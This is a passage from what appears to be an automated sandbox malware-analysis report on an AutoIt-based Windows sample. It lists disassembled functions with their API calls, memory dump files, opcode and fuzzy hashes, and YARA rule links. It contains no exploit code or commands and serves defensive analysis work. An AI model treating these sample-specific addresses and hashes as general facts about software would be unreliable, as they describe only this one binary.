                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 85ca7c0eb7db713f39c1996161d0625f849a01401b049e2d50a7d08635986ccb
                                        • Instruction ID: 191a238029ee0a471b897e26379be741184923b1c621d5c35e47eaccc83edde6
                                        • Opcode Fuzzy Hash: 85ca7c0eb7db713f39c1996161d0625f849a01401b049e2d50a7d08635986ccb
                                        • Instruction Fuzzy Hash: 7EF06D32200399AFDB22EF58DC45FC67BA9FB06360F044559FA116B2E1CB706820D764
                                        Function 0033AC99 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,00000007,?,00000000,00000000,?,?), ref: 0033ACC7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogLongNtdllProc_Window
                                        • String ID:
                                        • API String ID: 2065330234-0
                                        • Opcode ID: 9eb65f59f70db4ccc873bfed04cf60924e8e902bd4afbbd91b2f83b9e650193a
                                        • Instruction ID: 1a5e10c9cb5f9967f4500e5099db4763dfd6ab535c41056fc10850b19f27293f
                                        • Opcode Fuzzy Hash: 9eb65f59f70db4ccc873bfed04cf60924e8e902bd4afbbd91b2f83b9e650193a
                                        • Instruction Fuzzy Hash: 9CE01235600208FBCF16AF90DC91E683B2AFF49394F108518F6464F6E1CB33A522EB51
                                        Function 0038F425 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL(?,00000053,?,?,?,0039F3D4,?,?,?,?,?,?), ref: 0038F450
                                          • Part of subcall function 0038E13E: _memset.LIBCMT ref: 0038E14D
                                          • Part of subcall function 0038E13E: _memset.LIBCMT ref: 0038E15C
                                          • Part of subcall function 0038E13E: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,003E3EE0,003E3F24), ref: 0038E18B
                                          • Part of subcall function 0038E13E: CloseHandle.KERNEL32 ref: 0038E19D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: _memset$CloseCreateDialogHandleNtdllProc_Process
                                        • String ID:
                                        • API String ID: 2364484715-0
                                        • Opcode ID: 0b843b464d23d5e9901e7fa6e4614bf92feb40aa58e39610dd6e019cd72c7a53
                                        • Instruction ID: ba123c02901551033af6e4b04da2958e9ee3df7a0709ad6b9b018b377475f268
                                        • Opcode Fuzzy Hash: 0b843b464d23d5e9901e7fa6e4614bf92feb40aa58e39610dd6e019cd72c7a53
                                        • Instruction Fuzzy Hash: F1E04632100308DFCB12EF08DC44E9A37AAFB09340F018091FA015B2B1C731A920EF40
                                        Function 0038F37C Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 0038F3A1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 817873d52c90054c3646b6f9a5e76eedaa521b8b89708d1c4f1a0f493a820b21
                                        • Instruction ID: 97cea25caed394ae1eff75006dfa18b0e16fcc6b7f9039f3ad1ed1abad125543
                                        • Opcode Fuzzy Hash: 817873d52c90054c3646b6f9a5e76eedaa521b8b89708d1c4f1a0f493a820b21
                                        • Instruction Fuzzy Hash: 25E0173520424CEFCB02DF88DC84E8A3BA9FB1A350F040054FD058B361C771A830DB61
                                        Function 0038F3AB Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtdllDialogWndProc_W.NTDLL ref: 0038F3D0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DialogNtdllProc_
                                        • String ID:
                                        • API String ID: 3239928679-0
                                        • Opcode ID: 33534dcdf8d09bb13f66d9a530805e44270d9edfb814c8f7e83d4a2304a54c2c
                                        • Instruction ID: 4676c50fc0a13139f01f922138f7cef23686af9371902f7327c8d3470cb2d8fe
                                        • Opcode Fuzzy Hash: 33534dcdf8d09bb13f66d9a530805e44270d9edfb814c8f7e83d4a2304a54c2c
                                        • Instruction Fuzzy Hash: 24E0173520024CEFCB02DF88D884E8A3BA9FB1A350F040054FD058B362C772A830EBA1
                                        Function 0033B845 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0033AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0033AF8E
                                          • Part of subcall function 0033B86E: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0033B85B), ref: 0033B926
                                          • Part of subcall function 0033B86E: KillTimer.USER32(00000000,?,00000000,?,?,?,?,0033B85B,00000000,?,?,0033AF1E,?,?), ref: 0033B9BD
                                        • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,0033AF1E,?,?), ref: 0033B864
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                        • String ID:
                                        • API String ID: 2797419724-0
                                        • Opcode ID: ed661e89de3d873028a477bfb164b70b2fb863c7c2b80bd7bdeb0cfc503e5da4
                                        • Instruction ID: 5a306df4fcdd6ab7ba4f93c6fe52ec31262dbb304bd1b07791ba07df6350ff6f
                                        • Opcode Fuzzy Hash: ed661e89de3d873028a477bfb164b70b2fb863c7c2b80bd7bdeb0cfc503e5da4
                                        • Instruction Fuzzy Hash: E1D0127124430C77DB122B61DC07F4D7A1DAF01791F408420F7056D1E1CB7264109555
                                        Function 00348E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00348E1F
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 8a0648e3a9207c92ef0c35de64d9b475756fb0cef821aa17f9cd2d5e6011edb6
                                        • Instruction ID: 1bdccd5088224b57c88283b0f3e99f23254b589726b3dd1c60dce42b5ee7dbb0
                                        • Opcode Fuzzy Hash: 8a0648e3a9207c92ef0c35de64d9b475756fb0cef821aa17f9cd2d5e6011edb6
                                        • Instruction Fuzzy Hash: D3A0123000050CA78E011B51EC044447F5CD606250B004010F40D00421873354104981
                                        Function 0034A937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00346AE9,003D67D8,00000014), ref: 0034A937
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 23821cdf46838ac84ed4de57b11dd6f26d1e9c93ea479c9885ac4a9cc31580c8
                                        • Instruction ID: 330149fbdc2c6a6bf2281f5403ed76a974050f4c2cbda29dea792e35565461e0
                                        • Opcode Fuzzy Hash: 23821cdf46838ac84ed4de57b11dd6f26d1e9c93ea479c9885ac4a9cc31580c8
                                        • Instruction Fuzzy Hash: A1B012B03031024BD74D4F38AC9411A39DC974A301701403D7003C69B1DB349450DF00
                                        Function 00340EC4 Relevance: .3, Instructions: 345COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                        • Instruction ID: 49ff7af529cbe74261c4634477873cfd256d86ad8813c04bcc9a7001c77d84a0
                                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                        • Instruction Fuzzy Hash: 03C1907330559349DF6E463A847483EBBE15AA27B131B076DD8B3CF4C4EE24E5A8D620
                                        Function 003412F9 Relevance: .3, Instructions: 341COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                        • Instruction ID: 28f03a24d91a8ef3320699fee80313d241c215ea9f151d46e6beebd15abe20c6
                                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                        • Instruction Fuzzy Hash: 72C1F3732055934ADF2F463AC47483EBAE15AA27B131B07ADD8B3CF5C4EE24E564D620
                                        Function 00340A8F Relevance: .3, Instructions: 331COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction ID: 07cc71b7ae80d0c844a20bb0e114face40d3ee2d21b91ddf48716b6ee2dd0412
                                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                        • Instruction Fuzzy Hash: 98C1B1733052934ADF2F463A847483EBAE19AA27B531B076DD5B2CF4D0EE34E564D620
                                        Function 00340677 Relevance: .3, Instructions: 323COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction ID: e8b0d82b299071900784d749a20e105a7f04c65d6dbe3df5b784bbedcf00fc72
                                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                        • Instruction Fuzzy Hash: EAC1AE733091934AEF2E463A847483EBAE15AA27B131B076DD5B3CF4D5EE34E524D620
                                        Function 00332191 Relevance: .1, Instructions: 89COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 37caefa2e50feac5454f9ea760279e7ec3a3dc3a30a53b1fa09cacefa9542ccc
                                        • Instruction ID: 8aca65f4698ca1a3f00c23723ea0b7e84ef10795e69d22eaf23c773005c917f8
                                        • Opcode Fuzzy Hash: 37caefa2e50feac5454f9ea760279e7ec3a3dc3a30a53b1fa09cacefa9542ccc
                                        • Instruction Fuzzy Hash: 363192350AE2E18FCB13CF74D8E1A827BF0EF4B71531919DAD0808F566C265A056DB52
                                        Function 0037A750 Relevance: 79.2, APIs: 40, Strings: 5, Instructions: 490filecommemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 0037A7A5
                                        • DeleteObject.GDI32(00000000), ref: 0037A7B7
                                        • DestroyWindow.USER32 ref: 0037A7C5
                                        • GetDesktopWindow.USER32 ref: 0037A7DF
                                        • GetWindowRect.USER32(00000000), ref: 0037A7E6
                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0037A927
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0037A937
                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037A97F
                                        • GetClientRect.USER32(00000000,?), ref: 0037A98B
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0037A9C5
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037A9E7
                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037A9FA
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037AA05
                                        • GlobalLock.KERNEL32(00000000), ref: 0037AA0E
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037AA1D
                                        • GlobalUnlock.KERNEL32(00000000), ref: 0037AA26
                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037AA2D
                                        • GlobalFree.KERNEL32(00000000), ref: 0037AA38
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0037AA4A
                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003AD9BC,00000000), ref: 0037AA60
                                        • GlobalFree.KERNEL32(00000000), ref: 0037AA70
                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0037AA96
                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0037AAB5
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037AAD7
                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0037ACC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                        • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                        • API String ID: 2211948467-3613752883
                                        • Opcode ID: b95a09002710937e4e551f52e6d1b8c3e66029d7134341614b7424082edec37b
                                        • Instruction ID: 6a7a1c13fae53ec3f7e082fcd98f95f266d5de67050854415bfbf06200742d3e
                                        • Opcode Fuzzy Hash: b95a09002710937e4e551f52e6d1b8c3e66029d7134341614b7424082edec37b
                                        • Instruction Fuzzy Hash: 8B028071900115EFDB26DFA4DC89EAE7BB9FF49310F008159F90AAB2A1D734AD41CB61
                                        Function 0038D095 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 260COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 0038D0EB
                                        • GetSysColorBrush.USER32(0000000F), ref: 0038D11C
                                        • GetSysColor.USER32(0000000F), ref: 0038D128
                                        • SetBkColor.GDI32(?,000000FF), ref: 0038D142
                                        • SelectObject.GDI32(?,00000000), ref: 0038D151
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0038D17C
                                        • GetSysColor.USER32(00000010), ref: 0038D184
                                        • CreateSolidBrush.GDI32(00000000), ref: 0038D18B
                                        • FrameRect.USER32(?,?,00000000), ref: 0038D19A
                                        • DeleteObject.GDI32(00000000), ref: 0038D1A1
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0038D1EC
                                        • FillRect.USER32(?,?,00000000), ref: 0038D21E
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0038D249
                                          • Part of subcall function 0038D385: GetSysColor.USER32(00000012), ref: 0038D3BE
                                          • Part of subcall function 0038D385: SetTextColor.GDI32(?,?), ref: 0038D3C2
                                          • Part of subcall function 0038D385: GetSysColorBrush.USER32(0000000F), ref: 0038D3D8
                                          • Part of subcall function 0038D385: GetSysColor.USER32(0000000F), ref: 0038D3E3
                                          • Part of subcall function 0038D385: GetSysColor.USER32(00000011), ref: 0038D400
                                          • Part of subcall function 0038D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0038D40E
                                          • Part of subcall function 0038D385: SelectObject.GDI32(?,00000000), ref: 0038D41F
                                          • Part of subcall function 0038D385: SetBkColor.GDI32(?,00000000), ref: 0038D428
                                          • Part of subcall function 0038D385: SelectObject.GDI32(?,?), ref: 0038D435
                                          • Part of subcall function 0038D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0038D454
                                          • Part of subcall function 0038D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0038D46B
                                          • Part of subcall function 0038D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0038D480
                                          • Part of subcall function 0038D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0038D4A8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
